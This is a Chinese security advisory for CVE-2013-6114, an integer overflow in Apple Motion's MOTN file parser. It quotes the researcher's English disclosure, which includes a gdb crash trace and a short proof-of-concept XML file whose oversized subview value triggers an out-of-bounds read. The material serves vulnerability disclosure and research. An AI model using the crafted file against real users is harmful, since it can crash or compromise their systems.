Apple Motion 'OZDocument::parseElement()' 函数整数溢出漏洞


发布日期:2013-12-20
更新日期:2013-12-23

受影响系统:
Apple Motion < 5.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62874
CVE(CAN) ID: CVE-2013-6114

Motion是苹果公司推出的一款动态图片编辑工具,能进行文字和字母制作生成动画。

Apple Motion 5.1之前版本处理MOTN文件时'OZDocument::parseElement()' 函数存在整数溢出错误,成功利用后可造成越界内存访问,允许任意代码执行。

<*来源:Jean Pascal Pereira
 
  链接:http://secunia.com/advisories/56196/
        http://www.exploit-db.com/exploits/28811/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Apple Motion Integer Overflow Vulnerability
===========================================

Vendor: Apple (http://www.apple.com)
Software: Motion 5.0.7
Testcase verified on: OS X 10.8

Credit: Jean Pascal Pereira <pereira@secbiz.de>

DESCRIPTION
===========

An integer overflow vulnerability has been identified in Apple Motion. The issue has been verified for Motion 5.0.7 (current release). Prior versions may also be affected.

An attacker has the possibility to provide a crafted .motn file containing a viewer element with a subview attribute. If the subview attribute is set to a very low or high integer value, the application crashes due an access violation.

Debug message:

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000002dd6e0990
0x0000000100858eb7 in OZDocument::parseElement ()

The crash is triggered in the function OZDocument::parseElement() at the following instruction:

(gdb) x/i 0x0000000100858eb7
0x100858eb7 <_ZN10OZDocument12parseElementER22PCSerializerReadStreamR15PCStreamElement+695>:  mov rsi, QWORD PTR [rbx+rax*8+0x98]

The value of rax is controlled by the attacker (in this case, the rax register contains the integer 989894991 which is provided in the PoC below).

(gdb) p $rax
$16 = 989894991

(gdb) p/x $rbx+($rax*8)+0x98
$1 = 0x2dd6e0990

PROOF OF CONCEPT
================

Create a .motn file with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ozxmlscene>
<ozml version="5.5">
<viewer subview="989894991">
</viewer>
</ozml>

DISCLOSURE TIMELINE
===================
2013/09/18: Vendor notified
2013/10/07: Public disclosure

建议:
--------------------------------------------------------------------------------
厂商补丁:

Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com/support/downloads/
http://support.apple.com/kb/HT6041
http://archives.neohapsis.com/archives/bugtraq/2013-12/0119.html

相关内容